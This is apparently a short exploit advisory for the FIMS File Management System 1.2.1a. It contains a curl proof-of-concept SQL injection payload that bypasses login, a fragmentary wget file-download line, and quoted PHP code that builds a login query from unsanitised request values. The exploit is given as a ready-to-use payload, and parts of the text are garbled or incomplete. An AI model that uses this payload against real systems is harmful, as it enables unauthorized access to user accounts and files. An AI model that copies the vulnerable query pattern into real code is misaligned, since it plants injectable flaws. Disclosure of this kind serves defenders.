# Exploit Title: fims - File Management System <= 1.2.1a SQL Injection andVulnerability
# Date: 2011-10-19
# Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Software Link: http://fims.codeplex.com/
# Version: 1.2.1a (tested)
PoC (POST or GET data)
curl --data "l=help@juno.com&password=word') or id=ABS('1"
wget "{anyfile number}"
Vulnerable code
Line 18 of index.php:
if (login($g_db, $_REQUEST[email], $_REQUEST[password]))
Line 117 of functions.php:
function login($db, $email, $password)
$rs = $db->execute("select * from fims_user where email='$email' and password=md5('$password')");
if ($db->numrows($rs)>0) return true;
else return false;
Line 51 of index.php:
if (isset($_REQUEST[f]))
$file = get_file_data($g_db, $_REQUEST[f]);
header("Accept-Ranges: bytes");
header("Content-Length: ".filesize("files/".$file[id]));
header("Content-Type: {$file[mime]}");
header("Content-Disposition: inline; filename=\"{$file['label']}\";");